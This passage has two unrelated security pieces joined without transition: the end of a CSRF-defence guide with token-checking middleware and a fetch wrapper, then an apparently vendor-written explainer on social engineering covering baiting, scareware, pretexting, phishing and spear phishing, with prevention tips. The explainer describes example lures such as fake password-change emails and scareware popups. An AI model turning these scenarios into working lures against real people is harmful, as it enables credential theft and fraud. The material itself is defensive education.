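    // Applied application-wide, before any route handlers.
    function csrfProtection(req, res, next) {
      // Safe, read-only methods pass through; state-changing methods are checked.
      if (['GET', 'HEAD', 'OPTIONS'].includes(req.method)) return next();

      const token = req.get('X-CSRF-Token');
      if (!token || !verifyToken(req.session.id, token)) {
        return res.status(403).send('Missing or invalid CSRF token');
      }
      next();
    }

    // app.use(csrfProtection);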

3. Request-Checking Middleware: Implement middleware to validate headers and CSRF tokens before processing requests. This ensures consistent application of security measures across all endpoints.

4. Client-Side Automation: Automate the inclusion of CSRF tokens in client requests. This can be done by overriding the default behavior of XMLHttpRequest or using a custom library to wrap requests.
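For example, a small browser-side wrapper around fetch can attach the token automatically (the meta tag and header names below are common conventions, not requirements):

    // Read the token the server embedded in the page.
    function csrfToken() {
      const meta = document.querySelector('meta[name="csrf-token"]');
      return meta ? meta.content : '';
    }

    // Wrap fetch so every request carries the token in a custom header.
    function secureFetch(url, options = {}) {
      const headers = { ...(options.headers || {}), 'X-CSRF-Token': csrfToken() };
      return fetch(url, { ...options, headers });
    }

    // Usage: secureFetch('/api/profile', { method: 'POST', body: JSON.stringify(data) });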

Conclusion

Defending against CSRF attacks requires a multi-faceted approach, combining header verification, CSRF tokens, and best coding practices. By implementing these strategies, developers can significantly reduce the risk of CSRF attacks and protect users' authenticated sessions. Ensuring that GET requests do not alter state, applying application-wide defenses, and automating token inclusion on the client side are critical steps in maintaining a secure web application.
WHAT IS SOCIAL ENGINEERING

Social engineering is the term used for a broad range of malicious activities
accomplished through human interactions. It uses psychological manipulation to
trick users into making security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first investigates the intended victim to gather necessary background information, such as potential points of entry and weak security protocols, needed to proceed with the attack. Then, the attacker moves to gain the victim’s trust and provide stimuli for subsequent actions that break security practices, such as revealing sensitive information or granting access to critical resources.

Social Engineering Attack Lifecycle

What makes social engineering especially dangerous is that it relies on human error, rather than vulnerabilities in software and operating systems. Mistakes made by legitimate users are much less predictable, making them harder to identify and thwart than a malware-based intrusion.

Social engineering attack techniques


Social engineering attacks come in many different forms and can be performed
anywhere where human interaction is involved. The following are the five most
common forms of digital social engineering assaults.

Baiting

As its name implies, baiting attacks use a false promise to pique a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or inflicts their systems with malware.

The most reviled form of baiting uses physical media to disperse malware. For
example, attackers leave the bait—typically malware-infected flash drives—in
conspicuous areas where potential victims are certain to see them (e.g.,
bathrooms, elevators, the parking lot of a targeted company). The bait has an
authentic look to it, such as a label presenting it as the company’s payroll list.

Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online forms of baiting consist of enticing ads that lead to malicious sites or
that encourage users to download a malware-infected application.

Scareware

Scareware involves victims being bombarded with false alarms and fictitious
threats. Users are deceived to think their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners appearing in your browser while surfing the web, displaying text such as, “Your computer may be infected with harmful spyware programs.” It either offers to install the tool (often malware-infected) for you or will direct you to a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings or
makes offers for users to buy worthless/harmful services.
Pretexting

Here an attacker obtains information through a series of cleverly crafted lies.


The scam is often initiated by a perpetrator pretending to need sensitive
information from a victim so as to perform a critical task.

The attacker usually starts by establishing trust with their victim by impersonating co-workers, police, bank and tax officials, or other persons who have right-to-know authority. The pretexter asks questions that are ostensibly required to confirm the victim’s identity, through which they gather important personal data.

All sorts of pertinent information and records are gathered using this scam, such
as social security numbers, personal addresses and phone numbers, phone
records, staff vacation dates, bank records and even security information related
to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams are
email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. It then prods them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

An example is an email sent to users of an online service that alerts them of a policy violation requiring immediate action on their part, such as a required password change. It includes a link to an illegitimate website, nearly identical in appearance to its legitimate version, prompting the unsuspecting user to enter their current credentials and new password. Upon form submittal the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing campaigns, detecting and blocking them is much easier for mail servers with access to threat-sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam whereby an attacker chooses specific individuals or enterprises. They then tailor their messages based on characteristics, job positions, and contacts belonging to their victims to make their attack less conspicuous. Spear phishing requires much more effort on behalf of the perpetrator and may take weeks and months to pull off. They’re much harder to detect and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an organization’s IT consultant, sends an email to one or more employees. It’s worded and signed exactly as the consultant normally does, thereby deceiving recipients into thinking it’s an authentic message. The message prompts recipients to change their password and provides them with a link that redirects them to a malicious page where the attacker now captures their credentials.

Social engineering prevention

Social engineers manipulate human feelings, such as curiosity or fear, to carry out schemes and draw victims into their traps. Therefore, be wary whenever you feel alarmed by an email, attracted to an offer displayed on a website, or when you come across stray digital media lying about. Being alert can help you protect yourself against most social engineering attacks taking place in the digital realm.

Moreover, the following tips can help improve your vigilance in relation to
social engineering hacks.

• Don’t open emails and attachments from suspicious sources – If you don’t know the sender in question, you don’t need to answer an email. Even if you do know them and are suspicious about their message, cross-check and confirm the news from other sources, such as via telephone or directly from a service provider’s site. Remember that email addresses are spoofed all of the time; even an email purportedly coming from a trusted source may have actually been initiated by an attacker.
• Use multifactor authentication – One of the most valuable pieces of
information attackers seek are user credentials. Using multifactor
authentication helps ensure your account’s protection in the event of
system compromise. Imperva Login Protect is an easy-to-deploy 2FA
solution that can increase account security for your applications.
• Be wary of tempting offers – If an offer sounds too enticing, think twice
before accepting it as fact. Googling the topic can help you quickly
determine whether you’re dealing with a legitimate offer or a trap.
• Keep your antivirus/antimalware software updated – Make sure
automatic updates are engaged or make it a habit to download the latest
signatures first thing each day. Periodically check to make sure that the
updates have been applied and scan your system for possible infections.
